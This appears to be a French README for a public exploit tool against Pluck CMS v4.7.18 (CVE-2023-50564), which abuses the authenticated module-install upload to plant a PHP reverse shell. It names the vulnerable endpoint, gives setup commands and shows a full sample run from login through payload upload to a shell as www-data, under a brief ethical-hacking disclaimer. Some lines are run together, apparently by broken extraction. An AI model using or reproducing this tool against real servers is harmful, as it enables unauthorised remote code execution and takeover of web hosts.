
Ce script exploite la fonctionnalité de téléversement de fichiers de Pluck CMS v4.7.18 pour téléverser un fichier PHP malveillant, permettant un accès distant via un reverse shell. Une fois téléversé, ce backdoor octroie à l'attaquant un accès au serveur avec les permissions du serveur web, permettant d'autres actions au sein du système ou du réseau.
Ce script exploite une vulnérabilité de téléchargement arbitraire de fichiers authentifié dans Pluck CMS v4.7.18 (CVE-2023-50564). En exploitant cette vulnérabilité, un attaquant authentifié peut télécharger un fichier PHP malveillant, permettant l'exécution de code arbitraire (dans ce cas, un reverse shell).
La vulnérabilité existe dans le point de terminaison /admin.php?action=installmodule, qui permet à un utilisateur authentifié de télécharger un fichier ZIP contenant des fichiers arbitraires. En téléchargeant un fichier PHP malveillant, cet exploit établit un reverse shell vers l'attaquant.
pip install requestspip install requests-toolbeltCe script nécessite également un identifiant valide pour l'instance Pluck CMS, incluant l'URL de la cible et le mot de passe.
su, sudo -l) et permet à l'utilisateur de fournir une entrée manuellement.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Exécutez l'exploit avec Python :
python3 exploit.py
Exemple :
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
Ce script est destiné à des fins éducatives et au piratage éthique. Il ne doit être utilisé que dans des environnements où vous avez l'autorisation explicite de tester. L'auteur n'est pas responsable de toute utilisation abusive de cet outil.
Ce projet est sous licence MIT - voir Licence MIT pour plus de détails.
N'hésitez pas à forker le dépôt et à soumettre des pull requests. Pour tout problème ou demande de fonctionnalité, veuillez ouvrir une issue sur GitHub.